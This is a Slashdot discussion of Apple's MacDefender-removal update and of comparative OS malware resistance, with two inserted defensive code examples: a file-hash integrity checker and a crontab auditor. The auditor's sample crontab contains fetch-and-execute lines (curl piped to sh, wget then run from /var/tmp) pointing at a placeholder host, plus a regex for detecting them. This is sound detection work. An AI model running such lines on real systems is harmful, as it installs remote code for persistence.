Mac OS Update Detects, Kills MacDefender Scareware
CWmike writes "Apple released an update for Snow Leopard on Tuesday that warns users that they've downloaded fake Mac security software and scrubs already-infected machines. Chet Wisniewski, a security researcher with Sophos, confirmed that the update alerts users when they try to download any of the bogus MacDefender antivirus software. Wisniewski had not yet tested the malware cleaning functionality of the update, but was confident that it would work. 'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of the crap that we see on Windows.' The update, labeled 2011-003, adds a new definition to the rudimentary antivirus detection engine embedded in Mac OS X 10.6, aka Snow Leopard, and also increases the frequency with which the operating system checks for new definitions to daily."
ahhh... (Score:3)
So Mac Users should expect this? (Score:5, Insightful)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of the crap that we see on Windows.'
Pity it won't always be that way, survival of the fittest applies to viruses too.
Re:So Mac Users should expect this? (Score:5, Insightful)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
Not really any different than Microsoft's monthly "Malicious Software Removal" update that's pushed for Windows.
Or for more comprehensive scanning (Score:3, Insightful)
Microsoft Security Essentials. It is not included in Windows, due to anti-trust restrictions (so that may change with Windows 8 since those restrictions are going away) but it is a free download. Updates itself automatically like all AV scanners, will also update via Windows Update if there's a problem.
Comment removed (Score:5, Interesting)
Re: (Score:2)
The first Windows bugs were pretty primitive and easy to kill too. I remember when a simple booting into safe mode and tossing the files would kill a great number of bugs.
You don't even know the difference between malware and bugs.
Re:Or for more comprehensive scanning (Score:4, Insightful)
Seriously, now that there is blood in the water the sharks will come, and it will only get worse. They saw they were able to get some good numbers with MacDefender and now MacGuard, and thanks to Hackintosh they don't even need to buy an Apple to test their code on! The first Windows bugs were pretty primitive and easy to kill too. I remember when a simple booting into safe mode and tossing the files would kill a great number of bugs. Mark my words, this is just the beginning; within 6 months I predict we'll be seeing our first really nasty deep-buried Apple malware. Who knows, we may even see an Apple Code Red style mass infection!
Yeah, their "Pretty Good Numbers" were measured in maybe a few hundred Macs, worldwide. Yeah, that's some epidemic. And the ONLY reason it got as far as it did was because of all the lame-ass website admins who got infected by the fake banner ad, and then the genius move of poisoning several Search Engines' Page Rank systems [abc3340.com], so those sites came up high in search results. So, the REAL SUCCESSFUL "attack" was on those websites. And I would bet my bottom dollar that the vast majority of infections were of gullible Windows-Switchers, who cannot fathom a computer platform that DOESN'T regularly need "Virus Scans". The veteran Mac users KNOW better! (Yes, I'm being smug).
Oh, and one of the reasons this will NEVER get to the level of a Windows problem is simple: Macs don't have a "Registry", in the sense that Windows does. Without that idiotic, centralized database of thousands of system and application settings, it is literally impossible to create malware that can survive simple file-replacement techniques. The problem is that there is literally NO reliable mechanism to "rebuild" a seriously damaged Registry. Microsoft can't do it, Third Parties can't do it, and users DAMN sure can't do it!
This is why SO many problems with Windows end with the tried-and-true mantra of "Wipe and Reload" (a/k/a the "back off and nuke it from orbit" method). Because, quite literally, it is often the ONLY way to be sure.
But, since Apple uses .plist files, and since the rule is that they can be REBUILT if deleted, it's gonna be pretty damned hard for something to really scrog an OS X system. At least in a way that cannot be relatively easily "rebuilt".
And that tune you've been singing has been sung for over ELEVEN years now, and what? Heck, even Linux has much, much more "malware" than OS X. In fact, over 250 times as much.
Re:Or for more comprehensive scanning (Score:5, Insightful)
Complete balderdash.
You can't trust a machine that's running malware to tell the truth when it tells you that it is now clean, because for all you know the malware has hooked into the very API routines your anti-malware product depends upon. Anyone who's spent any serious length of time trying to clean up a heavily infested Windows PC will attest to that.
There's booting from a CD, which is much more sensible but only 100% workable if you have a whacking great database of checksums for every valid executable, every DLL, everything that may contain runnable code on the planet, and you can somehow use the CD to patch all known vulnerabilities on a system, including local exploits that may take advantage of something the user's already downloaded.
A heuristic algorithm is never going to be 100% reliable because you're essentially only one step away from trying to solve the halting problem; the only real difference is instead of asking "Will the computer halt?" you're asking "Will the computer do something undesirable?". The best you can hope for is to say it probably won't.
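The post above makes two defensive points: a running, possibly compromised system cannot be trusted to report on itself, and an offline check needs a database of known-good checksums. The following is an added example (not code from the commenter or from Apple) of the simplest form of that offline check: hash every file under a tree, save the result as a baseline, and later diff the tree against it. The sample directory tree and the "tampering" applied to it are constructed inline so the script runs stand-alone; in practice the baseline would be taken from a trusted image and the comparison run from boot media, since hashes computed on the live machine inherit whatever the malware has hooked.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    baseline = {}
    for entry in sorted(root.rglob("*")):
        # Symlinks are skipped: hashing their target hides what the link points at.
        if entry.is_file() and not entry.is_symlink():
            baseline[entry.relative_to(root).as_posix()] = sha256_of(entry)
    return baseline


def compare_to_baseline(root, baseline):
    """Return files whose hash changed, files not in the baseline, and files that vanished."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "missing": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Constructed scenario: snapshot a tiny tree, tamper with it, report the differences."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")  # constructed stand-in
        (root / "lib").mkdir()
        (root / "lib" / "libc.so").write_bytes(b"\x7fELF placeholder bytes")  # constructed stand-in

        baseline = build_baseline(root)  # this is the "known-good" snapshot

        # Simulated compromise: one binary replaced, one library dropped in, one removed.
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\necho tampered\n")
        (root / "lib" / "evil.so").write_bytes(b"constructed dropped file")
        (root / "lib" / "libc.so").unlink()

        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

The point the commenter makes still stands: the diff is only as good as the baseline, and a baseline covering "everything that may contain runnable code" is enormous, which is why vendors ship signed catalogs rather than expecting users to build one.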
Re: (Score:3)
I'm no MS apologist (I run Slack on my laptop and an Ubuntu server at work, Eucalyptus cloud), but there are a whole lot of inaccuracies here. Any kernel-level malware invalidates your "literally impossible" file replacement argument.
And yet, you fail to explain how. And yes, the rest of your comment firmly labels you as a Windows (or at least Windows Registry) apologist.
The original execution of the registry was poor, but the concept of a fast and reliable btree key-value store for all your program settings isn't that idiotic (think dbus, gnomeconf, etc).
ANY centralized database of critical configuration information is inherently fragile. Period. And doubly so with the Windows registry, because it is such a mess.
The modern windows registry has plenty of permissions built in the important areas, although it is admittedly a mess of disorganization still.
Permissions are only good until the filesystem is tricked into ignoring them with a privilege escalation. And since most Windows users still run as Administrator, that isn't even necessary.
There are plenty of mechanisms to restore a registry; in fact it can be rebuilt in parts if need be. You can walk the structure and recreate the index. UBCD has an excellent one, for example.
That assumes you both
Re:Or for more comprehensive scanning (Score:5, Insightful)
Also, Microsoft includes an extra set of license checks with MSE - it's supposedly quite difficult to get it working on pirated copies of Windows. So it serves as an incentive for people to buy their OS (rather than pirate). Thus how MS sees it as a profit-making product.
Re: (Score:3)
It also lowers the price of the computer. That's why computers with Windows can be cheaper than computers with Linux. It could be a win-win-win-win (MS, manufacturer, AV vendor, user) situation if only those Symantec and McAfee products would actually work and work well.
Re: (Score:2)
Re: (Score:2, Insightful)
...what?
Re: (Score:3)
If I am reading what you said correctly, you believe that Microsoft insists all computers sold with a Windows pre-install also come with a McAfee pre-install?
If I parsed that correctly, you're mistaken. Microsoft insists no such thing. Where did you get that idea? Or am I misunderstanding what you're trying to say?
Re: (Score:3, Interesting)
Not really any different than Microsoft's monthly "Malicious Software Removal" update that's pushed for Windows.
Exactly. Sad to say, but exactly.
Re: (Score:2)
It's basically the same, yeah. Unless you happen to get stupid the day after the last update on Windows, you may not notice you've been infected for ~29 days, as opposed to, like, ~1.
~1 is a lot better than ~29, isn't it?
Re: (Score:2)
Malware almost always comes out the day after the update, that way you have a one month window before anything is likely to be done about it.
Re: (Score:2)
It WASN'T that different, except now it is updating definitions. Before it was updated only through the Software Update system, just like the Malicious Software Removal Tool. Now it is more like Security Essentials, except without the behavioral detection.
Re:So Mac Users should expect this? (Score:5, Funny)
More reason to use Windows: you get more sophisticated malware for your money.
Re: (Score:3)
The Mac scanner only scans for Trojans at this point (3 of them including MacDefender), not viruses. Apple has typically left virus scanning up to 3rd parties, while taking a more active role in alerting users about phishing and malware up front.
Re:So Mac Users should expect this? (Score:4, Informative)
The Mac scanner only scans for Trojans at this point (3 of them including MacDefender), not viruses. Apple has typically left virus scanning up to 3rd parties, while taking a more active role in alerting users about phishing and malware up front.
Ummm, what viruses would it be looking for? There aren't any real, in-the-wild Mac viruses unless you count MacGuard, which barely qualifies and is only delivered via a trojan that happens to spawn a separate app at run time.
Re:So Mac Users should expect this? (Score:5, Informative)
There have been some actual viruses in the wild for Mac, but the vulnerabilities are quickly patched, effectively preventing the viruses from spreading on any up-to-date system. http://www.scmagazineus.com/second-mac-virus-in-the-wild/article/32987/ [scmagazineus.com]
Despite the misleading claims in the article you cite, according to F-Secure, "Inqtana.A has not been met in the wild and has an internal counter that prevents its operation after 24. February 2006. So it is unlikely that this variant would be a threat to Mac Users." It was an academic proof of concept, not an in-the-wild spreading virus, and I've seen no reports of it in the wild. Sadly, people writing articles parrot terms like "in the wild", "zero day" and "virus" without understanding what the terminology actually means.
Re: (Score:2, Informative)
No, that was just an example (of which 4 variants of Inqtana were found). Go farther back and you'll also find reports for Mac OS Classic (ranging anywhere from 4 to 60-some-odd viruses depending on your source). Contrast that to the 100,000+ that have been found for a Windows-based PC over the years and the comparison takes on new meaning, but it does not mean that OS X will always be invulnerable. It is typically one of the first to fall in White Hat conventions, which of course leads to quick patches to c
Re: (Score:3)
To be fair, at most of those contests, more people are trying to win the Mac than the Windows box, thus making the amount of time to breach a largely uninteresting metric when it comes to determining how secure the OS is.
A more interesting metric is how long known security bugs go unpatched. Unfortunately, accurately obtaining such metrics without a colossal leak would be i
Re: (Score:2)
Time to breach is even less relevant because the order of people attempting is randomised...
On the other hand, if someone finds a bug in OSX there is really only one target for the exploit, whereas with windows there are many different versions which may require modified exploit code (wildly different hardware/drivers, home/pro/ultimate/etc, different language versions)... And Linux actually takes this even further.
Re:So Mac Users should expect this? (Score:5, Informative)
First off (and I only make this point because you seem to be trying to make this distinction), there are absolutely NO viruses for Mac OS X. None.
Second, there were plenty of viruses for classic Mac OS. This, however, has absolutely nothing to do with whether Mac OS X has viruses (for the rest of this post, I'm using a more broad term for virus, to include trojans and worms, and the like).
Third, there is a small handful of malware for the Mac, including (almost exclusively) trojans. No one is claiming otherwise, not even the people you are replying to.
Fourth, in White Hat conventions, *ALL* the systems fall. They tend to fall after certain restrictions have been removed. Macs often fall first (by mere seconds) because people want to win the Mac more than they want to win the PC.
Even knowing this I still don't use a virus scanner at present as I simply don't see a need. That said I am not foolish enough to believe that it will remain Virus free indefinitely.
Who is this imaginary person you think is saying that Macs will remain "virus free indefinitely"? This last line pretty much describes every single Mac user, from those that worry the Virus Armageddon is pending, and those that think they have nothing to worry about. No one claims this is a permanent state of things, just that it's how it is now, and tomorrow is another day.
Re: (Score:3)
Go farther back and you'll also find reports for Mac OS Classic
What's that got to do with the vulnerability or invulnerability of OS X? It's a completely different OS.
It is typically one of the first to fall in White Hat conventions, which of course leads to quick patches to close any vulnerabilities.
Spurious. For many reasons as pointed out under those /. stories. For example with the last one, OSX was declared as first to fall on day 1. Linux hadn't even been available for exploiting yet. It was timetabled to be available on day 2.
There only seems to have been two instances of malware that got into the wild. The one that was included in the torrented pirate copies of iWork 09. And last months "Mac D
Re: (Score:2)
There have been some actual viruses in the wild for Mac, but the vulnerabilities are quickly patched, effectively preventing the viruses from spreading on any up-to-date system.
http://www.scmagazineus.com/second-mac-virus-in-the-wild/article/32987/ [scmagazineus.com]
According to your link, the vulnerability was patched the year before the virus was unveiled by Sophos. And it wasn't "in the wild". That's a lot more than "quickly patched". That's Sophos creating an exploit based on a vulnerability they've only discovered because Apple fixed it.
Chance of you catching it: 0%, even at the time of that article. Chance of Sophos selling antivirus based on scare-mongering: only slightly higher.
Re:So Mac Users should expect this? (Score:4, Interesting)
That reminds me of people who were commenting here on slashdot about the fact that it doesn't matter that the malware installs without using root access, see, it does matter.
Re: (Score:3)
The only thing root access gives malware authors is rootkit installation and removal hardening. They can still read and write user files, which could lead to either ID theft, or ransomware by proprietary file encryption.
Re: (Score:2)
That reminds me of people who were commenting here on slashdot about the fact that it doesn't matter that the malware installs without using root access, see, it does matter.
I'm not sure you understand the people who say "root doesn't matter".
Malware doesn't have to stick around very long to be profitable, it only has to spread widely.
So while, yes, root matters for the cleanup...
No, it doesn't matter when it comes to logging your keystrokes and obtaining your credit card numbers/banking info/passwords.
Either way, you've gotten screwed and the malware distributors have made some money.
Re:So Mac Users should expect this? (Score:5, Informative)
Actually, on Mac OS X, it does matter.
Thus, to my knowledge, unless you exploit a bug in the OS, it should not be possible to sniff passwords in Mac OS X unless an app is running as root.
That's not to say that it can't steal passwords in other ways—spoofing password dialogs, stealing your Safari cookie files, reading your Safari bookmarks and pretending to be Safari while it displays your bank's website, etc.—but it should not be able to capture passwords that you enter in other applications. Thus, root matters. A lot.
Re: (Score:3)
Being that it's not installed with root permissions means it's easy to remove. When it can keep you from seeing it when you're looking for it (aka, root permissions), you're hosed. It's the difference between fully installing the system again along with all your programs and such and then restoring from backup, and just possibly restoring from backup if something gets hosed. You do back up, right?
Keyloggers need root (Score:2)
But it doesn't matter if you just want the piece of malware to do its job: e.g. key-log and scan for personal information
Scanning no, but to intercept keystrokes would require root access.
in addition to keeping a self-updater that may eventually pull an update that does allow for the use of an escalation exploit.
Pretty sure it would need root to install even as a start-up item, and it would be pretty visible if it did so.
Re: (Score:2)
Pity it won't always be that way, survival of the fittest applies to viruses too.
True. Also worth noting is that some environments are more hospitable to them than others. If OS X continues to grow in market share it becomes a more alluring target for virus creators, but if the system itself is very secure then you still won't see more than a trickle. Look at the difference between Apache on Linux and IIS on Windows for example. Relative security levels play a huge role.
Re: (Score:2)
So every virus for Macs will get killed in the next update? Very nice work for Apple if it happens that way.
'It's reasonably trivial to remove MacDefender,' said Wisniewski. 'It's not burying itself in the system, not compared to some of the crap that we see on Windows.'
Pity it won't always be that way, survival of the fittest applies to viruses too.
Actually, the way Mac OS X works, it's very difficult to construct a program that "buries" itself in the system. It's even somewhat more difficult to do than it is in Linux. On Mac OS X, every single program can be found by dropping to a bash shell. The places that get called on startup are few and easily managed.
That's not to say it's impossible or anything, but these sort of pithy responses that amount to "well, on Windows it does this, so it's only a matter of time until this happens on OS X, too" genera
Re: (Score:2)
...As long as you bought the very latest version of OSX. At least that's what TFS claims.
What are we detecting? (Score:5, Funny)
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
Re:What are we detecting? (Score:4, Insightful)
The summary mentions:
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
No... it's customary to look for signs of an infection even if you can't see the infection itself. So by detecting anti-virii (and spelling nazis be damned) you prove that the system has come into contact in the past with a genuine virus. Unfortunately, as time goes on you find that more and more systems develop anti-virii until the entire population has developed them, thus leading you to posit that the original virus was very, very widespread. However, by now, due to the universality of the anti-virii, all systems are now safe from the original virus. Which is all well and good until something to do with an unclean telephone occurs. Hmm, does that make Apple one of the telephone sanitizers????
Re: (Score:2)
So you use an incorrect form and you know it and you are proud of that? I'm pretty sure that stupidity is worse than ignorance.
Re:What are we detecting? (Score:5, Insightful)
Wouldn't we be better off detecting the viruses, not the antivirus?
The distinction between those two categories grows hazier every year...
Re: (Score:2)
The distinction between those two categories grows hazier every year...
This is easy - the one that screws up all your network connections is the ... ah, hell.
Re: (Score:2)
The summary mentions:
the rudimentary antivirus detection engine
Wouldn't we be better off detecting the viruses, not the antivirus?
Well, if Norton on the Mac is anything like on Windows, removing it would probably provide a greater overall benefit than detecting and removing actual malware.
Nothing can possibly go wrong (Score:2)
'It's not burying itself in the system, not compared to some of the crap that we see on Windows.'
at least, we hope not (yet).
Re: (Score:2)
at least, we hope not (yet).
Wouldn't it be pretty trivial to do a byte-by-byte comparison of a machine that's infected and one that isn't?
Re: (Score:2)
That's what's known as "whistling past the graveyard."
"I've got some little cold sores, but it's nothing like herpes or anything..."
Honest question about security of unix systems (Score:2)
Re:Honest question about security of unix systems (Score:4, Interesting)
Re: (Score:3, Interesting)
Re:Honest question about security of unix systems (Score:4, Interesting)
This is possible to set up in Windows, GNU/Linux (using SELinux; you can also simplify things and run your web browser in the SELinux sandbox, which confines downloaded programs to the same sandbox, and by default deletes those programs when the sandbox is closed), FreeBSD (with TrustedBSD), TrustedSolaris (if anyone still cares about Solaris), AIX, etc...but I am not sure that this is something that is officially supported in Mac OS X. That being said, Mac OS X does have mandatory access control built into its kernel, and as far as I know that is what is used to implement "parental controls."
OS X's Mandatory Access Controls are a port of TrustedBSD. They are used to sandbox selected services in OS X to improve security, but not widely deployed yet for userspace software. You can configure them yourself using the CLI or using a third party application like "Sandbox".
Re: (Score:2)
Re: (Score:2)
A Windows system can be set up to have the same security model as a Unix system, and this has been recommended by Microsoft for years. However, so many legacy applications expect "administrator" privileges in Windows that this is not the easiest thing to do.
OS X's Mandatory Access Controls are a port of TrustedBSD. They are used to sandbox selected services in OS X to improve security, but not widely deployed yet for userspace software. You can configure them yourself using the CLI or using a third party application like "Sandbox".
MS cannot be secured to the same degree: a simple .reg file can disable UAC without warning, disable 64-bit driver signing, and install a root Certificate Authority. This Java Applet exploit [securelist.com] (a variant of which I've found on US machines attacking US bank accounts) shows Windows security for what it is: an afterthought, easily disabled.
Both OSX and Linux security are far superior IMO than Windows, but I do have working "root" level proof of concept exploits for all 3 -- reported, and unpatched (excep
Re: (Score:2, Troll)
As a final note, Mac OS X is routinely the first system to be defeated at pwn2own; some say this is because it is less secure, others say it is because the participants want Mac OS X systems more than Windows systems.
OSX is the first system to be defeated at pwn2own because it's less secure, not because the OSX system is a more wanted prize. Charles Miller (the man who takes down OSX at pwn2own) has answered this before in an interview. [threatpost.com]
Many pundits have made a lot of the fact that the Mac was the first to be exploited in the Pwn2Own contest. Was the choice of the Mac as the first target because the hardware/operating system combo was more desirable as a prize than the commodity Windows laptops of the other competitors? Or was it just because Macintosh exploits occur with much less frequency than Windows exploits and would therefore be more newsworthy?
So until this year, applications on Apple were way easier to exploit than Windows. This is because Apple had weak ASLR and no DEP while Windows had full ASLR and DEP. This year, Snow Leopard has DEP, so it's no longer trivial to exploit. In fact, I have lots of bugs in Safari that I easily could have exploited on Leopard but will be very difficult on Snow Leopard. So it used to be that it was much worse, but now it's mostly comparable (although still slightly behind).
Re: (Score:2)
Re: (Score:2)
errr...?
So until this year, applications on Apple were way easier to exploit than Windows. This is because Apple had weak ASLR and no DEP while Windows had full ASLR and DEP. This year, Snow Leopard has DEP, so it's no longer trivial to exploit. In fact, I have lots of bugs in Safari that I easily could have exploited on Leopard but will be very difficult on Snow Leopard. So it used to be that it was much worse, but now it's mostly comparable (although still slightly behind).
bold mine.
Also.
Another question from the Twittersphere: What OS/browser pairing to you use? Do you do anything special (beyond default settings) to secure yourself while browsing?
You're not trying to pwn me are you??? Have you ever heard the saying about the cobbler's kids not having shoes? That's me, I'm afraid. I use Safari on OSX with no special settings. This isn't the most secure combination, by any stretch of the imagination, but I like it. It's designed by Apple engineers to be easy to use and 'just work' and it does. The risk of malware is low, and hey, I'm a security expert right :) The risk of a targeted attack is real, except I don't think I'm important enough to be targeted! So I rely on security by obscurity, I guess
That same guy also says he feels perfectly safe browsing on Safari on top of OSX.
So?
Re: (Score:2)
Re: (Score:2)
The malware that relies on social engineering techniques (like the one mentioned in this discussion) is very hard to protect against. Basically, user with some kind of system privileges to install software is lured to download the software, attempt to install it, provide their password when asked by the OS/installer. If you have a user w
Re: (Score:2)
To this date there have not been any viruses (i.e. self propagating code that infects machines without user intervention) for Mac OS X and I'm pretty sure Linux as well.
You should at least try using a search engine before making a remark like that:
https://help.ubuntu.com/community/Linuxvirus [ubuntu.com]
I say this as someone who has used nothing except GNU/Linux for many years now: there are viruses out there that will infect a vulnerable GNU/Linux system. Do not be fooled, these things are out there. As an exercise, you can try to write a very basic virus that targets the vi text editor and inserts itself into any C program a user creates (if you want bonus points, have th
Re: (Score:2)
Re: (Score:2)
point is that people who opt to use some kind of UNIX as their primary machine are usually not technically clueless
That has not been my observation; the majority of Mac OS X users I know of do not know a lot about their computers, nor are they interested in learning. They purchased a system with Mac OS X because they heard that it was easy to use and would give them fewer headaches than a Windows system.
The second point is that most UNIX distros (including OS X) come with hundreds of tools to monitor the system, inspect binaries etc.
Tools which only the most experienced users can use to detect malware; even technically literate people may not be able to spot suspicious behavior.
Also, a good chunk of software is downloaded as source and compiled on the localhost. This also gives you a chance to look at the code directly.
Allow me to introduce you to my favorite programming contest:
h [xcott.com]
Re:Honest question about security of unix systems (Score:5, Insightful)
Windows was more insecure because Microsoft designed it to be scriptable with COM/DCOM objects that apps can use to integrate into one another for app embedding. ActiveX objects are just objects designed from the ground up to mix Win32 applets inside IE. The whole object model is based upon using proprietary Win32 code and APIs so the programmers do not have to code as much. This was designed for lock-in and accessibility everywhere with no security in mind. Unfortunately, this meant I can write some VB 6 app to call Win32 functions to wipe your hard drive and I can just copy the DLL over as an ActiveX object in IE. If you have IE 5 or earlier, all you would have to do is visit my webpage and it would run automatically on your computer and it would be trash. The ILOVEYOU worm that hit it big in Outlook was a simple VBA script that copied the string and did a simple call to the user's address book. Most of the Win32 API was designed for Windows 95, built on DOS, which had no concept of user rights. Only the security API for Windows NT had that modern concept. These APIs were ported over to Windows XP.
Buffer overflows are something else, and the poor memory management of Windows causes GP faults, which everyone and their brother received back in the Win 9x days. Microsoft had trouble enforcing this because DOS and Windows 3.1 apps mostly just took random memory addresses, and one would just take an address of something else and bluescreen and take down your system. So if you are a hacker and know when a RAM address ends with a certain DLL (thanks to a debugger) you can put some code in that address and WHAM, instant execution. Windows also has no concept of data for execution vs. data for storage. This is a flaw of x86 actually, but you could put executable code in just a cookie or a temp file and it would not be hard to trick Windows, when it is done executing a DLL, to go to your program, and it will totally bypass security. You can do this in Unix as well, but this is very uncommon today as you need to be root, and it was a hack of the early 80s when coders wrote in assembly to gain performance tricks. This is frowned upon in the Unix world as there are excellent libraries that can obtain speeds close to assembly. Not to mention users do not want to log in as root. These same assembly calls stayed in Windows due to backwards compatibility, as Windows XP has the default user as an administrator. Doh
Anyway, this was why Windows was less secure and why MS wants you to switch to .NET. Less to do with market share but more to do with poor design decisions and the requirement to be backwards compatible. I am so sick of those saying Windows is great and it is market share or something else stupid.
Re: (Score:2)
ActiveX in IE 5 was a mess. Luckily it was EOL 10 years ago, try running 10 year old versions of Mac or Linux OSs and see how secure they are. Current versions of IE are better, and of course, if you don't run IE at all you're immune from ActiveX attacks as no other major browsers support it (and the other occasional vector, Outlook, is crazy paranoid these days).
The full user account ACL/permissions stuff has been in mainstream Windows since XP (again, many years ago).
Re: (Score:2)
Only the security API for Windows NT had that modern concept. These APIs were ported over to Windows XP
No NT APIs were 'ported' to XP. XP was NT (version 5.1, build 2600, to be precise).
Re: (Score:3)
Windows was more insecure because Microsoft designed it to be scriptable with COM/DCOM objects that apps can use to integrate into one another for app embedding. ActiveX objects are just objects designed from the ground up to mix Win32 applets inside IE.
COM/DCOM is a binary object model for creating object-oriented APIs. A COM API is just an API following some specific conventions. The convention describes how an "object" must point to a type which must have a jump table. Nothing is more or less secure about it.
It is correct that ActiveX is a COM model for extending the browser (and other types of applications). As such you can compare it to extension APIs such as NSAPI in other browsers. Nothing inherently more secure or insecure about that. Now, MS *also*
Re: (Score:2)
For years I have understood that Unix systems were less prone to security threats posed by malware/viruses/hackers due to the basic security model of Unix. When naysayers said Mac was less prone because of marketshare, the argument against this is the large number of Linux servers which have never been successfully targeted by any major security threat. While this malware attack is a trojan (and more social engineering), are the naysayers actually correct that Mac has not been successfully attacked because of marketshare? If so, are Unix systems not inherently more secure due to their design than other OSes?
Thanks!
When given equal incentives ($10k and/or a free laptop) to compromise an OS, OSX has always gone down first and most easily in the annual pwn2own contest. That's been a pretty clear indication that security by obscurity is Apple's main defense. "Unix systems" can be incredibly secure, but OSX is a rather flimsy incarnation of one.
Re: (Score:2)
Here is a very good article on security of Microsoft IIS vs. Apache on a Linux system:
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux/ [theregister.co.uk]
Have fun reading.
Re: (Score:2)
From that ancient (2004) article:
This reasoning backfires when one considers that Apache is by far the most popular web server software on the Internet. According to the September 2004 Netcraft web site survey, [1] 68% of web sites run the Apache web server. Only 21% of web sites run Microsoft IIS. If security problems boil down to the simple fact that malicious hackers target the largest installed base, it follows that we should see more worms, viruses, and other malware targeting Apache and the underlying operating systems for Apache than for Windows and IIS.
Ugh. Which operating system are the most compromised (2010): http://www.zone-h.org/news/id/4737 [zone-h.org]
Linux 1.126.987
Windows 2003 197.822
FreeBSD 46.992
Win 2008 15.083
F5 Big-IP* 14.000
Unknown 7.840
Win 2000 6.097
Which servers?
Apache 1.095.982
IIS/6.0 195.154
nginx 40.640
LiteSpeed 37.795
Zeus 14.111
Seems reality caught up with that conjecture.
Re: (Score:2)
There is no operating system that can protect against user stupidity.
Sadly, most users are stupid.
Correct. Though most Windows shops mitigate the stupidity by eliminating the users, and making everyone an administrator.
Re: (Score:2)
For years you have been assuming something that isn't true. The basic Unix security model is nothing special.
I agree. But people spout this all the time on Slashdot.
The two main reasons for this are the lack of homogeneity among various Unix-type operating systems and the differing average competence level of Windows vs Unix admins.
Don't forget the differing purposes. When people start talking about "all the Linux servers out there" they're usually comparing it to all the Windows clients out there. If you're comparing a client to a server, there are a whole class of attacks that won't hit the server (probably) because you aren't browsing, reading e-mail on it, etc.
That said, I've seen plenty of Unix machines get compromised in various ways, from defaced websites to guessed login
Re: (Score:2)
Chet (Score:2)
I haven't heard that name since I stopped reading "Hardy Boys" as a kid.
There really isn't a cure for this kind of thing. (Score:4, Insightful)
Userspace malware is nothing different than Purple Gorilla Bonzi-Buddy shit.
There is no OS or kernel patch that protects against stupid.
I can install the SELinux scripts, and there is nothing preventing me from utterly hosing the system as administrator or my own account with my own permissions. You would have to make a read-only system, maintained by someone not-me. This is what corporate IT does.
I see a market for itinerant bonded neighborhood sysadmins should people get over themselves and admit that joe-user can't handle his own computer at home.
--
BMO
Re: (Score:2)
There's no complete cure, no; but there's stuff that you can do to make it better. Apple updating the security mechanism to get its malware definitions on a daily basis, instead of as part of the normal Software Update cycle, is a very good move. It won't completely fix things, though, of course. You're absolutely right, you can't stop stupid.
But you can certainly make stupid _worse_: and Safari's "open safe files" feature (especially defaulting to yes), which includes dmgs (think, isos kinda for non-Mac fo
Re: (Score:2)
Userspace malware is nothing different than Purple Gorilla Bonzi-Buddy shit.
Purple Gorilla Bonzi-Buddies that quietly wait in the background downloading exploit code for the privilege escalation du jour. Once there's userspace malware, user-intervention isn't required; sometimes not even a login since it can use the system's scheduling (cron/schtasks.exe) to download when the user is logged out, and schedule a new exploit attempt immediately after download.
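An added example, not part of the comment above and not code from Apple or any tool named in the thread: a small POSIX shell audit for exactly the crontab pattern just described, a scheduled job that fetches and runs something while nobody is logged in. Everything in it is constructed: the sample crontab, the `.invalid` hostname, and the heuristics in `SUSPICIOUS_RE`, which are a starting list of the author's own rather than any product's signature set.

```shell
#!/bin/sh
# Added example, not from the thread: flag "fetch-then-execute" entries in a
# crontab, the persistence pattern the comment above describes.  The sample
# jobs are constructed for illustration; the URL uses the reserved .invalid TLD.

# Heuristics a defender would apply to a scheduled job: a remote fetch piped
# straight into an interpreter, or a command living in a world-writable dir.
# This list is an assumption (a starting point), not an exhaustive rule set.
SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(sh|bash|python|perl)|/tmp/|/var/tmp/|/dev/shm/'

# write_sample_crontab FILE: constructed crontab mixing legitimate jobs with
# the kind of lines a dropper would add so it keeps running when the user
# is logged out.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh --quiet
*/15 * * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/10 * * * * curl -s http://updates.example.invalid/p.sh | sh
@reboot /tmp/.cache/update
*/30 * * * * wget -q -O /var/tmp/.x http://updates.example.invalid/x && /var/tmp/.x
EOF
}

# flag_cron_lines FILE: print each non-comment job line that matches the
# heuristics, prefixed with its line number in FILE.  Exit status is grep's:
# 0 when something was flagged, 1 when the file looks clean.
flag_cron_lines() {
    grep -n -E -v '^[[:space:]]*(#|$)' "$1" | grep -E "$SUSPICIOUS_RE"
}

# count_suspicious FILE: number of flagged job lines; always exits 0.
count_suspicious() {
    flag_cron_lines "$1" | wc -l | tr -d ' '
}

# audit_crontab FILE: human-readable report for one crontab file.
audit_crontab() {
    n=$(count_suspicious "$1")
    if [ "$n" -eq 0 ]; then
        printf '%s: no suspicious job lines\n' "$1"
    else
        printf '%s: %s suspicious job line(s)\n' "$1" "$n"
        flag_cron_lines "$1" | sed 's/^/  line /'
    fi
}

# Stand-alone demo against the constructed sample.
sample=$(mktemp)
write_sample_crontab "$sample"
audit_crontab "$sample"
rm -f "$sample"
```

On a real machine, save `crontab -l` for each account to a file and pass it to `audit_crontab`; the two legitimate jobs in the sample stay quiet, the three planted ones are reported with their line numbers. launchd plists on OS X and Windows scheduled tasks are different formats and would need their own parser.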
Re: (Score:2)
